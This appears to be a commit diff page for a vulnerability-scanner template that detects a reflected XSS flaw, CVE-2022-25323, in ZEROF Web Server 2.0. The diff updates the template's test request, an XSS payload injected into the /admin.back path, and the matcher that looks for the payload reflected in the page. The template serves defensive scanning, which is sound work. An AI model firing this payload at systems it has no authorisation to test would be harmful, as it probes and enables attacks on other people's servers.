Update CVE-2022-25323.yaml
parent
280de89a19
commit
fd011250b3
|
@ -6,20 +6,21 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: ZEROF Web Server 2.0 allows /admin.back XSS.
|
description: ZEROF Web Server 2.0 allows /admin.back XSS.
|
||||||
reference:
|
reference:
|
||||||
|
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
||||||
tags: xss,cve,cve2022,zerof
|
tags: xss,cve,cve2022,zerof
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/admin.back<img%20src=xxx%20onerror=alert(document.cookie)>"
|
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<img src=xxx onerror=alert(document.cookie)>'
|
- 'back<img src=x onerror=alert(document.domain)>'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue